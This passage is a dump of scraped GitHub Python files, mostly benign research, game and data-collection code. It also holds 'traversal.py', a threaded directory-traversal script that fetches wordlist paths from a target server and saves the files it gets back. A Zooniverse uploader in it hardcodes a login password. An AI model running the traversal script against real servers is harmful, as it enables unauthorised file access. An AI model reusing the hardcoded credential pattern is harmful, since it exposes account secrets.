self.parse_double()\n\n elif info.type == rdata.parser._parser.RObjectType.CPLX:\n length = self.parse_int()\n\n value = np.empty(length, dtype=rdata.parser._parser.np.complex_)\n\n for i in range(length):\n value[i] = self.parse_complex()\n\n elif info.type in [\n rdata.parser._parser.RObjectType.STR,\n rdata.parser._parser.RObjectType.VEC,\n rdata.parser._parser.RObjectType.EXPR\n ]:\n length = self.parse_int()\n\n value = [None] * length\n\n for i in range(length):\n value[i] = self.parse_R_object(reference_list)\n\n elif info.type == rdata.parser._parser.RObjectType.NILVALUE:\n value = None\n\n elif info.type == rdata.parser._parser.RObjectType.REF:\n value = None\n referenced_object = reference_list[info.reference]\n\n else:\n raise NotImplementedError(f'Type {info.type} not implemented')\n\n if info.tag and not tag_read:\n rdata.parser._parser.warnings.warn(\n f'Tag not implemented for type {info.type} and ignored'\n )\n if info.attributes and not attributes_read:\n attributes = self.parse_R_object(reference_list)\n\n result = rdata.parser._parser.RObject(\n info=info,\n tag=tag,\n attributes=attributes,\n value=value,\n referenced_object=referenced_object,\n )\n\n if add_reference:\n reference_list.append(result)\n\n return result\n\n rdata.parser._parser.Parser.parse_R_object = parse_R_object\n\n\n_patch_rdata()\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/rdata.py","file_name":"rdata.py","file_ext":"py","file_size_in_byte":5927,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"70116301868","text":"import argparse\nimport os\nimport re\nimport tarfile\nfrom zipfile import ZipFile\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\nimport gdown\nimport pandas as pd\nfrom six import remove_move\n\n\ndef download_and_extract(url, dst, remove=True):\n gdown.download(url, dst, quiet=False)\n\n if dst.endswith(\".tar.gz\"):\n tar = tarfile.open(dst, \"r:gz\")\n tar.extractall(os.path.dirname(dst))\n tar.close()\n\n if dst.endswith(\".tar\"):\n tar = tarfile.open(dst, \"r:\")\n tar.extractall(os.path.dirname(dst))\n tar.close()\n\n if dst.endswith(\".zip\"):\n zf = ZipFile(dst, \"r\")\n zf.extractall(os.path.dirname(dst))\n zf.close()\n\n if remove:\n os.remove(dst)\n\n\ndef download_datasets(data_path, datasets=['celeba', 'waterbirds', 'civilcomments', 'multinli']):\n os.makedirs(data_path, exist_ok=True)\n dataset_downloaders = {\n 'celeba': download_celeba,\n 'waterbirds': download_waterbirds,\n 'civilcomments': download_civilcomments,\n 'multinli': download_multinli,\n }\n for dataset in datasets:\n dataset_downloaders[dataset](data_path)\n\ndef download_civilcomments(data_path):\n logging.info(\"Downloading CivilComments\")\n civilcomments_dir = os.path.join(data_path, \"civilcomments\")\n os.makedirs(civilcomments_dir, exist_ok=True)\n download_and_extract(\n \"https://worksheets.codalab.org/rest/bundles/0x8cd3de0634154aeaad2ee6eb96723c6e/contents/blob/\",\n os.path.join(civilcomments_dir, \"civilcomments.tar.gz\"),\n )\n\ndef download_multinli(data_path):\n logging.info(\"Downloading MultiNLI\")\n multinli_dir = os.path.join(data_path, \"multinli\")\n glue_dir = os.path.join(multinli_dir, \"glue_data/MNLI/\")\n os.makedirs(glue_dir, exist_ok=True)\n multinli_tar = os.path.join(glue_dir, \"multinli_bert_features.tar.gz\")\n download_and_extract(\n \"https://nlp.stanford.edu/data/dro/multinli_bert_features.tar.gz\",\n multinli_tar,\n )\n os.makedirs(os.path.join(multinli_dir, \"data\"), 
exist_ok=True)\n download_and_extract(\n \"https://raw.githubusercontent.com/kohpangwei/group_DRO/master/dataset_metadata/multinli/metadata_random.csv\",\n os.path.join(multinli_dir, \"data\", \"metadata_random.csv\"),\n remove=False\n )\n\ndef download_waterbirds(data_path):\n logging.info(\"Downloading Waterbirds\")\n water_birds_dir = os.path.join(data_path, \"waterbirds\")\n os.makedirs(water_birds_dir, exist_ok=True)\n water_birds_dir_tar = os.path.join(water_birds_dir, \"waterbirds.tar.gz\")\n download_and_extract(\n \"https://nlp.stanford.edu/data/dro/waterbird_complete95_forest2water2.tar.gz\",\n water_birds_dir_tar,\n )\n\ndef download_celeba(data_path):\n logging.info(\"Downloading CelebA\")\n celeba_dir = os.path.join(data_path, \"celeba\")\n os.makedirs(celeba_dir, exist_ok=True)\n download_and_extract(\n \"https://drive.google.com/uc?id=1mb1R6dXfWbvk3DnlWOBO8pDeoBKOcLE6\",\n os.path.join(celeba_dir, \"img_align_celeba.zip\"),\n )\n download_and_extract(\n \"https://drive.google.com/uc?id=1acn0-nE4W7Wa17sIkKB0GtfW4Z41CMFB\",\n os.path.join(celeba_dir, \"list_eval_partition.txt\"),\n remove=False\n )\n download_and_extract(\n \"https://drive.google.com/uc?id=11um21kRUuaUNoMl59TCe2fb01FNjqNms\",\n os.path.join(celeba_dir, \"list_attr_celeba.txt\"),\n remove=False\n )\n\ndef generate_metadata(data_path, datasets=['celeba', 'waterbirds', 'civilcomments', 'multinli']):\n dataset_metadata_generators = {\n 'celeba': generate_metadata_celeba,\n 'waterbirds': generate_metadata_waterbirds,\n 'civilcomments': generate_metadata_civilcomments,\n 'multinli': generate_metadata_multinli,\n }\n for dataset in datasets:\n dataset_metadata_generators[dataset](data_path)\n\n\n\ndef generate_metadata_celeba(data_path):\n logging.info(\"Generating metadata for CelebA\")\n with open(os.path.join(data_path, \"celeba/list_eval_partition.txt\"), \"r\") as f:\n splits = f.readlines()\n\n with open(os.path.join(data_path, \"celeba/list_attr_celeba.txt\"), \"r\") as f:\n attrs = f.readlines()[2:]\n\n f = open(os.path.join(data_path, \"metadata_celeba.csv\"), \"w\")\n f.write(\"id,filename,split,y,a\\n\")\n\n for i, (split, attr) in enumerate(zip(splits, attrs)):\n fi, si = split.strip().split()\n ai = attr.strip().split()[1:]\n yi = 1 if ai[9] == \"1\" else 0\n gi = 1 if ai[20] == \"1\" else 0\n f.write(\"{},{},{},{},{}\\n\".format(i + 1, fi, si, yi, gi))\n\n f.close()\n\n\ndef generate_metadata_waterbirds(data_path):\n logging.info(\"Generating metadata for waterbirds\")\n df = pd.read_csv(os.path.join(data_path, \"waterbirds/waterbird_complete95_forest2water2/metadata.csv\"))\n df = df.rename(columns={\"img_id\": \"id\", \"img_filename\": \"filename\", \"place\": \"a\"})\n df[[\"id\", \"filename\", \"split\", \"y\", \"a\"]].to_csv(\n os.path.join(data_path, \"metadata_waterbirds.csv\"), index=False\n )\n\n\ndef generate_metadata_civilcomments(data_path):\n logging.info(\"Generating metadata for civilcomments\")\n df = pd.read_csv(\n os.path.join(data_path, \"civilcomments\", \"all_data_with_identities.csv\"),\n index_col=0,\n )\n\n group_attrs = [\n \"male\",\n \"female\",\n \"LGBTQ\",\n \"christian\",\n \"muslim\",\n \"other_religions\",\n \"black\",\n \"white\",\n ]\n cols_to_keep = [\"comment_text\", \"split\", \"toxicity\"]\n df = df[cols_to_keep + group_attrs]\n df = df.rename(columns={\"toxicity\": \"y\"})\n df[\"y\"] = (df[\"y\"] >= 0.5).astype(int)\n df[group_attrs] = (df[group_attrs] >= 0.5).astype(int)\n df[\"no active attributes\"] = 0\n df.loc[(df[group_attrs].sum(axis=1)) == 0, \"no active 
attributes\"] = 1\n\n few_groups, all_groups = [], []\n train_df = df.groupby(\"split\").get_group(\"train\")\n split_df = train_df.rename(columns={\"no active attributes\": \"a\"})\n few_groups.append(split_df[[\"y\", \"split\", \"comment_text\", \"a\"]])\n\n for split, split_df in df.groupby(\"split\"):\n for i, attr in enumerate(group_attrs):\n test_df = split_df.loc[\n split_df[attr] == 1, [\"y\", \"split\", \"comment_text\"]\n ].copy()\n test_df[\"a\"] = i\n all_groups.append(test_df)\n if split != \"train\":\n few_groups.append(test_df)\n\n few_groups = pd.concat(few_groups).reset_index(drop=True)\n all_groups = pd.concat(all_groups).reset_index(drop=True)\n\n for name, df in {\"coarse\": few_groups, \"fine\": all_groups}.items():\n df.index.name = \"filename\"\n df = df.reset_index()\n df[\"id\"] = df[\"filename\"]\n df[\"split\"] = df[\"split\"].replace({\"train\": 0, \"val\": 1, \"test\": 2})\n text = df.pop(\"comment_text\")\n\n df[[\"id\", \"filename\", \"split\", \"y\", \"a\"]].to_csv(\n os.path.join(data_path, f\"metadata_civilcomments_{name}.csv\"), index=False\n )\n text.to_csv(\n os.path.join(data_path, \"civilcomments\", f\"civilcomments_{name}.csv\"),\n index=False,\n )\n\n\ndef generate_metadata_multinli(data_path):\n logging.info(\"Generating metadata for multinli\")\n df = pd.read_csv(\n os.path.join(data_path, \"multinli\", \"data\", \"metadata_random.csv\"), index_col=0\n )\n\n df = df.rename(columns={\"gold_label\": \"y\", \"sentence2_has_negation\": \"a\"})\n df = df.reset_index(drop=True)\n df.index.name = \"id\"\n df = df.reset_index()\n df[\"filename\"] = df[\"id\"]\n df = df.reset_index()[[\"id\", \"filename\", \"split\", \"y\", \"a\"]]\n df.to_csv(os.path.join(data_path, \"metadata_multinli.csv\"), index=False)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Initialize repo with datasets\")\n parser.add_argument(\n \"datasets\",\n nargs=\"+\",\n default=['celeba', 'waterbirds', 'civilcomments', 'multinli'],\n type=str,\n help=\"Which datasets to download and/or generate metadata for\",\n )\n parser.add_argument(\n \"--data_path\",\n default=\"data\",\n type=str,\n help=\"Root directory to store datasets\",\n )\n parser.add_argument(\n \"--download\",\n action=\"store_true\",\n default=False,\n )\n args = parser.parse_args()\n\n if args.download:\n download_datasets(args.data_path, args.datasets)\n generate_metadata(args.data_path, args.datasets)\n","repo_name":"facebookresearch/BalancingGroups","sub_path":"setup_datasets.py","file_name":"setup_datasets.py","file_ext":"py","file_size_in_byte":8377,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"37"} +{"seq_id":"75034097066","text":"\"\"\"\"The class Save_Load for player to save the game and load a game.\"\"\"\n\nimport tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter.messagebox import showinfo\nimport os\n\nclass Save_Load():\n\tdef __init__(self,menu):\n\t\tself._Load_game=False\n\t\tself._menu=menu\n\t\tself.status=None\n\t\tself.master=''\n\t\tself.action_time=(1,1)\n\t\tself.path='memory/'\n\t\tself.files=[os.path.splitext(x)[0] for x in os.listdir(self.path) if os.path.splitext(x)[1]=='.txt']\n\n\tdef save_game(self):\n\t\tself.top=tk.Toplevel()\n\t\tself.top.title(\"save the game\")\n\t\tself.top.attributes(\"-topmost\", 
1)\n\t\ttk.Label(self.top,text=\"name\",width=10).grid(row=0,column=0,sticky=\"E\")\n\t\tself.name=tk.StringVar()\n\t\ttk.Entry(self.top,textvariable=self.name,width=20).grid(row=0,column=1)\n\t\ttk.Button(self.top,text='Confirm',command=self.save_txt).grid(row=1,column=0)\n\t\ttk.Button(self.top,text='Cancel',command=self.cancel_save).grid(row=1,column=1)\n\n\tdef save_txt(self):\n\t\ttxt_name=self.name.get()\n\t\tprint(self.files)\n\t\tif txt_name in self.files:\n\t\t\tres=tk.messagebox.askyesno(\"reminder\",\"A file already exists with that name. \")\n\t\t\tif not res:\n\t\t\t\treturn \"\"\n\t\ttxt_name=self.name.get()\n\t\tself.top.destroy()\n\t\ttxt_path=os.path.join(self.path,txt_name+'.txt')\n\t\twith open(txt_path,'w') as f:\n\t\t\tf.write('%s\\n%s\\n%s\\n%s\\n'%(self._move,self._score,self._companion.get_name(),self.count))\n\t\t\tfor dot,count in self._objectives_status:\n\t\t\t\tf.write(\"%s:%s,\"%(dot.get_view_id(),str(count)))\n\t\t\tf.write('\\n')\n\t\t\tfor position,cell in self._grid.items():\n\t\t\t\tif cell.get_dot():\n\t\t\t\t\tf.write(\"%s:%s;\"%(str(position),cell.get_dot().get_view_id()))\n\t\t\tf.write('\\n')\n\t\t\tf.write(\"{},{},{}\".format(self.action_time[0],self.action_time[1],self.action_time[2]))\n\n\tdef read_txt(self,txt_path):\n\t\twith open(txt_path,'r') as f:\n\t\t\tlines_list=f.read().split('\\n')\n\t\tself._move=int(lines_list[0])\n\t\tself._score=int(lines_list[1])\n\t\tself._companion=lines_list[2]\n\t\tself.count=int(lines_list[3])\n\t\tself._objectives_count=[int(x.split(':')[1]) for x in lines_list[4].split(',') if len(x)>0]\n\t\tself.grid_list=[[item.split(':')[0],item.split(':')[1]] for item in lines_list[5].split(';') if len(item)>0]\n\t\tself.action_time=[int(i) for i in lines_list[6].split(',')]\n\n\n\tdef cancel_save(self):\n\t\tself.top.destroy()\n\n\tdef load_game(self):\n\t\ttxt_path=filedialog.askopenfilename(title=\"Select file\",initialdir=os.path.abspath(self.path),filetypes=[(\"Txt Files\",\".txt\")])\n\t\tif txt_path:\n\t\t\tself.read_txt(txt_path)\n\t\t\tself._Load_game=True\n\t\t\tself._menu.refresh_companion(self._companion)\n\t\t\tself._menu.new_game(self.action_time)\n\t\t\tself._Load_game=False\n\n\tdef get_status(self,move,score,companion,objectives,grid,count_len=0):\n\t\tself._move=str(move)\n\t\tself._score=str(score)\n\t\tself._companion=companion\n\t\tself._objectives_status=objectives\n\t\tself._grid=grid\n\t\tself.count=count_len\n\n\tdef get_actionbar_time(self,action_time=(1, 1, 1)):\n\t\tself.action_time=action_time\n\n\n","repo_name":"leepard1130/Python-Project","sub_path":"assignment3/task3.py","file_name":"task3.py","file_ext":"py","file_size_in_byte":2885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"30981540671","text":"# Import necessary modules\nimport os\nimport sys\nimport requests\nfrom panoptes_client import Panoptes, Project, SubjectSet, Subject\nfrom package.apis.loaders.google_cloud_platform.gcp_request import process_files\n\n# Connect to the Zooniverse Panoptes API\nPanoptes.connect(username=\"carrowmw\", password=\"2VcqEhRjFKN73Tp\")\n\n# Get the current working directory\nroot = os.getcwd()\nprint(root)\n\n# Append the path of the 'package' folder to the system path\nsys.path.append(os.path.join(root, \"package\"))\n\n# Check if a project with the specified display name already exists\nprojects = list(\n Project.where(display_name=\"Learning from Earthquakes (Image Labelling)\")\n)\nif len(projects) > 0:\n # If yes, use the existing project\n 
learning_from_earthquakes = projects[0]\nelse:\n # Otherwise, create a new project\n learning_from_earthquakes = Project()\n learning_from_earthquakes.display_name = (\n \"Learning from Earthquakes (Image Labelling)\"\n )\n learning_from_earthquakes.description = (\n \"A project for labelling earthquakes so we can learn from them\"\n )\n learning_from_earthquakes.primary_language = \"en\"\n learning_from_earthquakes.private = True\n learning_from_earthquakes.save()\n\n# Check if a subject set with the specified name already exists\nsubject_sets = list(SubjectSet.where(display_name=\"Earthquake images subject set\"))\n\nif len(subject_sets) > 0:\n # If yes, use the existing subject set\n subject_set = subject_sets[0]\nelse:\n # Otherwise, create a new subject set\n subject_set = SubjectSet()\n subject_set.links.project = learning_from_earthquakes\n subject_set.display_name = \"Earthquake images subject set\"\n subject_set.save()\n\n# Reload the project to update it with the newly saved subject set\nlearning_from_earthquakes.reload()\n\n# Print the linked subject sets of the project\nprint(learning_from_earthquakes.links.subject_sets)\n\n# Fetch the data from Google Cloud Platform (GCP) and store it in a DataFrame\ndf = process_files(bucket_name=\"photos_for_zooniverse\")\n\n# Convert the DataFrame to dictionary format suitable for Panoptes subjects\nsubject_metadata = df.to_dict(orient=\"records\")\n\n# Fetch the list of subjects for the project\nsubjects = list(Subject.where(project_id=learning_from_earthquakes.id))\n\n# Create a list containing filenames of already uploaded subjects\nuploaded_files = [subject.metadata[\"#filename\"] for subject in subjects]\n\nnew_subjects = []\n\n# Loop through the metadata to create new subjects\nfor i, record in enumerate(subject_metadata):\n url = record[\"File URL\"]\n metadata = record[\"File Name\"]\n print(f\"Processing: {i+1}/{len(subject_metadata)}\")\n\n # Skip already uploaded files\n if metadata in uploaded_files:\n print(f\"File {metadata} already uploaded. 
Skipping.\")\n continue\n\n # Download the image file locally\n response = requests.get(url)\n local_filename = metadata + \".jpg\"\n with open(local_filename, \"wb\") as f:\n f.write(response.content)\n\n # Create a new subject\n subject = Subject()\n subject.links.project = learning_from_earthquakes\n subject.add_location(local_filename)\n\n # Add 'File Name' and 'File URL' to metadata\n subject.metadata.update(\n {\"#filename\": metadata, \"File Name\": metadata, \"File URL\": url}\n )\n\n subject.save()\n\n # Delete the local file after upload\n os.remove(local_filename)\n\n new_subjects.append(subject)\n\n# Add new subjects to the subject set\nif len(new_subjects) > 0:\n subject_set.add(new_subjects)\n print(\"New subjects added to the subject set.\")\n print(\"Processing completed.\")\nelse:\n print(\"No new subjects added\")\n","repo_name":"alekszaf/EarthquakeMetadata","sub_path":"package/apis/subject_uploader.py","file_name":"subject_uploader.py","file_ext":"py","file_size_in_byte":3649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27410019440","text":"from flask import Flask\n\nimport requests\n\napp = Flask(__name__)\n\nclient_id = 5000\n\nport_player1 = 5000\nport_player2 = 5000\n\nplayer1_score = 0\nplayer2_score = 0\n\nnum = 0\n\ntable_player1 = [[0 for i in range(10)] for j in range(10)]\n\ntable_player2 = [[0 for i in range(10)] for j in range(10)]\n\n\ndef string_to_table(s):\n\ttable_res = [[0 for i in range(10)] for j in range(10)]\n\tfor i in range(10):\n\t\tfor j in range(10):\n\t\t\ttable_res[i][j] = int(s[i*10 + j])\n\treturn table_res\n\n\n@app.route('/table/')\ndef table(arg):\n\tport = arg[100:]\n\tprint(port)\n\tglobal table_player2\n\tglobal table_player1\n\tif port == str(port_player2):\n\t\ttable_player2 = string_to_table(arg)\n\t\tprint(\"table of player2\")\n\t\tfor i in range(10):\n\t\t\tfor j in range(10):\n\t\t\t\tprint(table_player2[i][j], end=' ')\n\t\t\tprint()\n\telse:\n\t\ttable_player1 = string_to_table(arg)\n\t\tprint(\"table of player1\")\n\t\tfor i in range(10):\n\t\t\tfor j in range(10):\n\t\t\t\tprint(table_player1[i][j], end=' ')\n\t\t\tprint()\n\treturn 'ok'\n\n\n@app.route('/attack/')\ndef attack(arg):\n\tport = arg[2:]\n\tprint(port)\n\tglobal player1_score\n\tglobal player2_score\n\tif port == str(port_player2):\n\t\tprint(\"player2 attacks\", arg[0], arg[1])\n\t\tif table_player1[int(arg[1])][int(arg[0])] == 1:\n\t\t\tsend_attack(port_player1, int(arg[0]), int(arg[1]), 'y')\n\t\t\tplayer2_score += 1\n\t\t\tif player2_score == 20:\n\t\t\t\tprint(\"player1 wins\")\n\t\t\treturn 'y'\n\t\telse:\n\t\t\tsend_attack(port_player1, int(arg[0]), int(arg[1]), 'n')\n\t\t\treturn 'n'\n\telse:\n\t\tprint(\"player1 attacks\", arg[0], arg[1])\n\t\tif table_player2[int(arg[1])][int(arg[0])] == 1:\n\t\t\tsend_attack(port_player2, int(arg[0]), int(arg[1]), 'y')\n\t\t\tplayer1_score += 1\n\t\t\tif player1_score == 20:\n\t\t\t\tprint(\"player1 wins\")\n\t\t\treturn 'y'\n\t\telse:\n\t\t\tsend_attack(port_player2, int(arg[0]), int(arg[1]), 'n')\n\t\t\treturn 'n'\n\n\n@app.route('/connect')\ndef connect():\n\tglobal client_id\n\tglobal port_player1\n\tglobal port_player2\n\tglobal num\n\tclient_id += 1\n\tres = str(client_id)\n\tprint(\"Client %d connected\" % client_id)\n\tif num == 0:\n\t\tport_player1 = client_id\n\t\tnum = 1\n\t\tres = 'player1' + res\n\t\treturn res\n\telse:\n\t\tport_player2 = client_id\n\t\tnum = 0\n\t\tres = 'player2' + res\n\t\treturn res\n\n\ndef send_attack(port, x, y, 
r):\n\targ = str(x) + str(y) + str(r)\n\tid = 'http://localhost:' + str(port) + '/enemy_attack/' + str(arg)\n\treq = requests.get(id)\n\n\ndef send(arg, clid):\n\tid = 'http://localhost:' + str(clid) + '/index/' + str(arg)\n\treq = requests.get(id)\n\n\nif __name__ == '__main__':\n\tapp.run()\n","repo_name":"inigomontoya722/battle_ship_game","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3345594328","text":"from radmc3dPy import image\nimport argparse\n\nto_fits = argparse.ArgumentParser()\nto_fits.add_argument(\n 'input',\n help='the input radmc3d image file (typically image.out)'\n)\n\nto_fits.add_argument(\n '-o', metavar='FILE', dest='output',\n help='output fits file [default: .fits]'\n)\n\nto_fits.add_argument(\n '--dist', metavar='DISTANCE_PC',\n help='distance to source in pc [default 140]',\n type=float, default=140.0\n)\n\nto_fits.add_argument(\n '--ra', metavar='__h__m__s',\n help='right ascension [default 15h48m05s]',\n type=str, default='15h48m05s'\n)\n\nto_fits.add_argument(\n '--dec', metavar='__d__m__s',\n help='declination [default 24d00m00s]',\n type=str, default='24d00m00s'\n)\n\nto_fits.add_argument(\n '--bandwidth', metavar='BANDWIDTH_MHZ',\n help='bandwidth in MHz (ignored for multi-frequency) [default 2000]',\n type=float, default=2000.0\n)\n\nif __name__ == '__main__':\n args = to_fits.parse_args()\n im = image.readImage(args.input)\n output = args.output if args.output is not None else args.input + '.fits'\n im.writeFits(\n output, dpc=args.dist, bandwidthmhz=args.bandwidth,\n coord=f'{args.ra} {args.dec}'\n )\n\n if args.output is None:\n print(f'Output fits file written to {output}')\n","repo_name":"benburrill/radmc3d_image_setup","sub_path":"to_fits.py","file_name":"to_fits.py","file_ext":"py","file_size_in_byte":1273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11695884168","text":"import os\nimport requests\n\nURL = \"https://api.thegraph.com/subgraphs/name/uniswap/uniswap-v2\"\nUNISWAPV2_FILE = os.path.join(os.path.dirname(__file__), \"../data/uniswap_v2_addr_list.csv\")\n\n\ndef get_query(query):\n r = requests.post(URL, json={'query': query})\n if r.status_code == 200:\n return r.json()\n else:\n raise Exception('Query failed and return code is {}. 
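# The main() loop below implements cursor pagination over The Graph: fetch up
# to LIMIT pairs ordered by createdAtTimestamp, advance the cursor to the
# largest timestamp seen, and stop on a short page. A stripped-down sketch of
# that control flow (paginate and fetch are invented names; fetch stands in
# for the templated get_query call):
def paginate(fetch, limit=1000):
    cursor = 0
    while True:
        rows = fetch(cursor, limit)   # rows newer than the cursor, ascending
        for row in rows:
            cursor = max(cursor, int(row["createdAtTimestamp"]))
            yield row
        if len(rows) < limit:         # a short page means no more data
            break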
{}'.format(r.status_code, query))\n\n\ndef main():\n\n raw_query = \"\"\"query MyQuery {\n pairs(first:LIMIT, orderBy: createdAtTimestamp, orderDirection: asc, where: {createdAtTimestamp_gt: TIMESTAMP}) {\n id\n reserve0\n token0Price\n token0 {\n id\n name\n symbol\n decimals\n }\n reserve1\n token1Price\n token1 {\n id\n name\n symbol\n decimals\n }\n createdAtBlockNumber\n createdAtTimestamp\n }\n}\n \"\"\"\n if not os.path.exists(UNISWAPV2_FILE):\n with open(UNISWAPV2_FILE, \"w\") as f:\n columns = ['address', 'token0_address', 'token0_name', 'token0_symbol', 'token0_decimals', 'reserve0', 'token0_price', 'token1_address', 'token1_name', 'token1_symbol', 'token1_decimals', 'reserve1', 'token1_price', 'createdAtBlockNumber', 'createdAtTimestamp']\n f.write(\",\".join(columns) + \"\\n\")\n max_createdAtTimestamp = 0\n else:\n with open(UNISWAPV2_FILE, \"r\") as f:\n lines = f.readlines()\n line = lines[-1].strip()\n \n max_createdAtTimestamp = int(line.split(\",\")[-1])\n print(\"max_createdAtTimestamp: \", max_createdAtTimestamp)\n\n LIMIT = 1000\n\n while True:\n query = raw_query.replace(\"LIMIT\", str(LIMIT)).replace(\"TIMESTAMP\", str(max_createdAtTimestamp))\n result = get_query(query)\n\n while \"data\" not in result or \"pairs\" not in result[\"data\"]:\n result = get_query(query)\n\n for pair in result[\"data\"][\"pairs\"]:\n pair_address = pair[\"id\"]\n\n token0 = pair[\"token0\"]\n token0_address = token0[\"id\"]\n token0_name = token0[\"name\"].strip().replace(\",\", \"(comma)\")\n token0_symbol = token0[\"symbol\"].strip().replace(\",\", \"(comma)\")\n token0_decimals = token0[\"decimals\"]\n token0_price = pair[\"token0Price\"]\n reserve0 = pair[\"reserve0\"]\n\n token1 = pair[\"token1\"]\n token1_address = token1[\"id\"]\n token1_name = token1[\"name\"]\n token1_name = token1_name.strip().replace(\",\", \"(comma)\")\n token1_symbol = token1[\"symbol\"].strip().replace(\",\", \"(comma)\")\n token1_decimals = token1[\"decimals\"]\n token1_price = pair[\"token1Price\"]\n reserve1 = pair[\"reserve1\"]\n\n createdAtBlockNumber = pair[\"createdAtBlockNumber\"]\n createdAtTimestamp = pair[\"createdAtTimestamp\"]\n\n max_createdAtTimestamp = max(max_createdAtTimestamp, int(createdAtTimestamp))\n\n with open(UNISWAPV2_FILE, \"a\") as f:\n f.write(\",\".join([pair_address, token0_address, token0_name, token0_symbol, str(token0_decimals), str(reserve0), str(token0_price), token1_address, token1_name, token1_symbol, str(token1_decimals), str(reserve1), str(token1_price), str(createdAtBlockNumber), str(createdAtTimestamp)]) + \"\\n\")\n\n print(\"max_createdAtTimestamp: \", max_createdAtTimestamp)\n\n if len(result[\"data\"][\"pairs\"]) < LIMIT:\n break\n\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pillowsofwind/mev","sub_path":"collections/uniswap_v2_collect_thegraph.py","file_name":"uniswap_v2_collect_thegraph.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70345615147","text":"import time\nfrom tqdm import tqdm\n\n\nclass ReplayStub:\n def __init__(self, duration):\n self.duration = duration\n\n\ndef test_progressbar():\n replay = ReplayStub(10)\n for _ in tqdm(\n range(int(round(replay.duration + 5, 0))),\n desc=f'Watching replay for {replay.duration} seconds'\n ):\n time.sleep(1)\n\n\nif __name__ == '__main__':\n 
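# An equivalent progress loop using tqdm's manual-update API (a sketch, not
# part of the original test): handy when the loop body, rather than range(),
# decides how far the bar should advance.
import time
from tqdm import tqdm

def watch_replay(duration):
    with tqdm(total=duration, desc='Watching replay for {} seconds'.format(duration)) as bar:
        for _ in range(duration):
            time.sleep(1)
            bar.update(1)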
test_progressbar()\n","repo_name":"care1e55/pyautoreplay","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29781149593","text":"\"\"\"\nWrite a function that takes a string as input and reverse only \nthe vowels of a string.\n\nExample 1:\n\nInput: \"hello\"\nOutput: \"holle\"\n\"\"\"\n\nclass Solution:\n def reverseVowels(self, s: str) -> str:\n words = list(s)\n vowel = set(list(\"aeiouAEIOU\"))\n start, end = 0, len(s) - 1\n while start < end:\n if words[start] not in vowel:\n start += 1\n elif words[end] not in vowel:\n end -= 1\n else:\n words[start], words[end] = words[end], words[start]\n start += 1\n end -= 1\n\n return ''.join(words)\n","repo_name":"EpsilonHF/Leetcode","sub_path":"Python/345.py","file_name":"345.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13642844233","text":"import urllib2\nimport threading\nimport sys\nimport os\n\nhistory = []\n\ndef Crawl(dict,target,folder):\n\tglobal history\n\tfor uri in dict.readlines():\n\t\turi = uri.replace(\"\\n\",\"\").replace(\" \",\"\").replace(\"\\r\",\"\").replace(\"//\",\"\\\\\")\n\t\tif len(uri) > 1:\n\t\t\tif uri not in history:\n\t\t\t\thistory.append(uri)\n\t\t\t\turl = target + uri\n\t\t\t\ttry:\n\t\t\t\t\tres = urllib2.urlopen(url,timeout = 10)\n\t\t\t\t\thtmlSource = res.read()\n\t\t\t\t\tprint(\"Crawl PATH {}\".format(url))\n\t\t\t\t\tfile = open(folder + \"/\" + uri.split(\"/\")[-1],'w')\n\t\t\t\t\tfile.write(\"-----------\" + url + \"-----------\\n\")\n\t\t\t\t\tfile.write(htmlSource)\n\t\t\t\t\tfile.close()\n\t\t\t\t\tres.close()\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tprint(e)\n\nif __name__ == \"__main__\":\n\t\n\tif not os.path.exists(sys.argv[1]):\n\t\tos.mkdir(sys.argv[1])\n\t\t\n\tdict = file(sys.argv[2],'r')\n\tlist_thread = []\n\twhile True:\n\t\tif len(list_thread) < int(sys.argv[3]):\n\t\t\tthread = threading.Thread(target=Crawl, args=(dict,sys.argv[4],sys.argv[1],)) \n\t\t\tlist_thread.append(thread)\n\t\telse:\n\t\t\tbreak\n\n\tfor i in list_thread:\n\t\ti.start()\n\t\t\n\tfor i in list_thread:\n\t\ti.join()\n\n\t\t\n\n","repo_name":"sonpd2/Hacking-Knowledge","sub_path":"Exploits/Web Server Directory Traversal Arbitrary File Access/traversal.py","file_name":"traversal.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"15727368335","text":"import re\nimport pandas as pd\nfrom bs4 import BeautifulSoup\nimport datetime\nimport time\nfrom sklearn.decomposition import PCA\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pickle\n\ndef date_to_unix_time(date):\n if date is None or date == '':\n return None\n dt = datetime.datetime.strptime(date, '%B %d, %Y')\n return int(time.mktime(dt.timetuple()))\n\n\ndef get_n_grams(_text, _n, _gram_dict={}):\n # if a special character is being used as punctuation (not in a name) add a space\n _text = re.sub('(: )', ' \\\\g<1>', _text)\n _text = re.sub('(- )', ' \\\\g<1>', _text)\n _text = re.sub('(, )', ' \\\\g<1>', _text)\n _text = re.sub('(\\\\. )', ' \\\\g<1>', _text)\n _text = re.sub('(- )', ' \\\\g<1>', _text)\n _text = re.sub('(\\\\? )', ' \\\\g<1>', _text)\n _text = re.sub('(; )', ' \\\\g<1>', _text)\n _text = re.sub('(! 